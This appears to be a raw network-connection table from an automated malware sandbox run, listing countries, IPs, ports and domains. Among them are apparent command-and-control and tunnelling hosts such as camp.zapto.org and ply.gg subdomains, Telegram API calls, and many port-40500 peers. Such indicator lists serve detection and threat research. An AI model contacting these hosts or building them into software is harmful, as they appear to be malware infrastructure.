| US | 8.8.8.8:53 | 214.89.187.2.in-addr.arpa | udp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| AO | 129.122.141.24:40500 | udp | |
| US | 8.8.8.8:53 | 24.141.122.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| SY | 82.137.239.235:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 93.188.85.2:40500 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | 235.239.137.82.in-addr.arpa | udp |
| DE | 41.216.183.9:8080 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | grupodulcemar.pe | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| PE | 161.132.57.101:80 | grupodulcemar.pe | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 217.171.148.45:40500 | udp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 45.148.171.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| KR | 45.154.14.21:7777 | 45.154.14.21 | tcp |
| DE | 209.38.221.184:8080 | 209.38.221.184 | tcp |
| KZ | 95.58.91.70:40500 | udp | |
| DE | 46.235.26.83:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 70.91.58.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.14.154.45.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.164.120:40500 | udp | |
| US | 8.8.8.8:53 | 120.164.156.90.in-addr.arpa | udp |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 147.28.185.29:80 | 147.28.185.29 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| NL | 206.166.251.4:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| EG | 62.114.143.56:40500 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | 29.185.28.147.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 37.99.52.150:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 150.52.99.37.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 90.156.162.106:40500 | udp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 89.110.69.103:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 106.162.156.90.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| FR | 51.159.4.50:8080 | 51.159.4.50 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 50.4.159.51.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| RU | 45.150.24.42:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 42.24.150.45.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| KZ | 95.59.162.2:40500 | udp | |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.195:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.187.195:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.187.195:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| DE | 167.235.70.96:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| YE | 94.26.196.74:40500 | udp | |
| SY | 82.137.244.65:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 74.196.26.94.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| IR | 2.176.119.113:40500 | udp | |
| US | 8.8.8.8:53 | 113.119.176.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| YE | 78.137.64.239:40500 | udp | |
| US | 8.8.8.8:53 | 239.64.137.78.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 194.164.198.113:8080 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | educational-reform.gl.at.ply.gg | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| SY | 95.212.120.220:40500 | udp | |
| US | 8.8.8.8:53 | 220.120.212.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 93.188.86.253:40500 | udp | |
| US | 8.8.8.8:53 | 167.17.145.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.86.188.93.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | udp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DZ | 41.102.19.3:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 26.185.184.104:942 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| YE | 178.130.96.97:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 97.96.130.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| BA | 77.221.20.139:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 139.20.221.77.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| IR | 2.176.90.19:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 19.90.176.2.in-addr.arpa | udp |
| DE | 41.216.183.9:8080 | tcp | |
| DE | 209.38.221.184:8080 | 209.38.221.184 | tcp |
| DE | 46.235.26.83:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 88.151.180.214:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 214.180.151.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| IR | 94.183.35.46:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| IR | 2.176.109.189:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 189.109.176.2.in-addr.arpa | udp |
| DE | 147.28.185.29:80 | 147.28.185.29 | tcp |
| NL | 206.166.251.4:8080 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| IR | 2.190.67.184:40500 | udp | |
| US | 8.8.8.8:53 | 184.67.190.2.in-addr.arpa | udp |
| US | 26.185.184.104:942 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| FR | 51.159.4.50:8080 | 51.159.4.50 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| UZ | 195.158.22.4:40500 | udp | |
| US | 8.8.8.8:53 | 4.22.158.195.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| UZ | 217.30.162.37:40500 | udp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| RU | 185.215.113.67:21405 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 37.162.30.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.86:40500 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| MX | 189.191.143.93:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 93.143.191.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 2.176.92.74:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 74.92.176.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 41.216.183.9:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| SY | 82.137.218.134:40500 | udp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 134.218.137.82.in-addr.arpa | udp |
| DE | 209.38.221.184:8080 | 209.38.221.184 | tcp |
| DE | 46.235.26.83:8080 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 189.167.44.219:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 219.44.167.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| IR | 5.238.93.200:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 200.93.238.5.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 198.163.204.6:40500 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 37.78.33.95:40500 | udp | |
| US | 8.8.8.8:53 | 95.33.78.37.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 5.219.44.252:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 252.44.219.5.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| N/A | 172.16.16.140:40500 | udp | |
| US | 8.8.8.8:53 | 140.16.16.172.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| UZ | 87.237.234.195:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| IR | 151.243.58.90:40500 | udp | |
| US | 8.8.8.8:53 | 90.58.243.151.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.161.82:40500 | udp | |
| US | 8.8.8.8:53 | 82.161.156.90.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.56:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 56.160.156.90.in-addr.arpa | udp |
| IR | 188.212.88.213:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| PK | 124.109.48.132:40500 | udp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | 132.48.109.124.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 26.185.184.104:942 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| KZ | 95.58.216.162:40500 | udp | |
| US | 8.8.8.8:53 | 162.216.58.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| MX | 187.235.157.13:40500 | udp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 13.157.235.187.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 217.171.148.45:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| IR | 2.179.60.101:40500 | udp | |
| US | 8.8.8.8:53 | 101.60.179.2.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 78.37.229.249:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 249.229.37.78.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| KZ | 89.218.186.86:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 86.186.218.89.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| KZ | 95.59.165.102:40500 | udp | |
| US | 8.8.8.8:53 | 102.165.59.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| KZ | 92.46.228.246:40500 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 178.206.158.183:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 183.158.206.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
